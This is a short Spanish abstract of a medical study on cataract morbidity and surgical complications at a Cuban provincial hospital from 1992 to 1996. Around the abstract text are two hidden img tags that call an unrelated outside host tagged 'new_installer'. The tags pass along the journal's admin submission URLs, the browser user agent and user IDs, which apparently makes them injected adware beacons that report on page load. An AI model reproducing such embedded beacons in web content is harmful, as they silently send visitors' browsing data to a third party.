Algunos aspectos epidemiológicos y quirúrgicos de la morbilidad por catarata - Pérez Padilla, Carlos Alberto; Herrera Lazo, Zaihrys (Mediciego, 2000)
<img src="http://prettysite.xyz/acnt?_=1583235648025&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Fmanager%252Fimportexport%252Fplugin%252FQuickSubmitPlugin&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />Se realizó una investigación observacional descriptiva para conocer la morbilidad por catarata en el Hospital General Provincial Docente de Morón durante el período 1992-1996. De los 216 pacientes estudiados los resultados más importantes que se observaron fueron: el sexo masculino predominó con un 55.6 %; el 86.6 % de los pacientes pertenecían al grupo de edad de 60 o más años; el 93.5 % de los pacientes operados tuvieron complicaciones transoperatorias; la complicación transoperatoria más frecuente fue la ruptura de cápsula posterior, el 34.2 % de los pacientes tuvieron complicaciones postoperatorias, la complicación postoperatoria más frecuente fue la queratitis estriada.<img src="http://prettysite.xyz/acnt?_=1583235702322&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Fmanager%252Fimportexport%252Fplugin%252FQuickSubmitPlugin%252FsaveSubmit&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />